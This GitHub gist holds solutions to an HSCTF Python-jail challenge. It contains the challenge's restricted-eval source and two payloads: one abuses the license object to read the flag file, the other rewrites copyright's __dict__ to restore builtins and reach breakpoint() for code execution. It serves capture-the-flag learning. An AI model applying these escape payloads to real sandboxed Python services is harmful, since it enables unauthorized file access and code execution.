Skip to content

Instantly share code, notes, and snippets.

@maple3142

maple3142/mysol

Created June 11, 2022 05:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save maple3142/bcdbd2394873cc4051c5dab7c4472f9d to your computer and use it in GitHub Desktop.
Save maple3142/bcdbd2394873cc4051c5dab7c4472f9d to your computer and use it in GitHub Desktop.
Download ZIP
hsctf
Raw
mysol
type(license)(None,None,(input(),),(input(),))()
then input these:
flag
.
see https://github.com/python/cpython/blob/4c496f1f115a7910d4606b4de233d14874c77bfa/Lib/_sitebuiltins.py#L29-L85
Raw
pass-v2.py
#!/usr/bin/env python3
import string
def main():
allowed_chars = string.ascii_letters + string.digits + ",!+-/@&|~^<>(){}"
allowed_globals = vars(__builtins__).copy()
for var in (
"getattr", "eval", "exec", "__import__", "open", "__builtins__", "__build_class__",
"__loader__", "__spec__"
):
allowed_globals[var] = None
print("Python as a Service:")
print("Execute arbitrary Python code (with certain restrictions)")
while True:
try:
s = input("> ")
except (EOFError, KeyboardInterrupt):
exit()
if not s:
continue
if any(c not in allowed_chars for c in s):
print("Illegal characters")
continue
try:
print(eval(s, allowed_globals))
except Exception as e:
print(e)
if __name__ == "__main__":
main()
Raw
rcesol
setattr(copyright,'__dict__',globals()),delattr(copyright,'__builtins__')
replace string with input(), then
breakpoint()
it think this works because it is first remove `__builtins__` from global dict, so it is same as not blocking anything builtins on next exec call
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment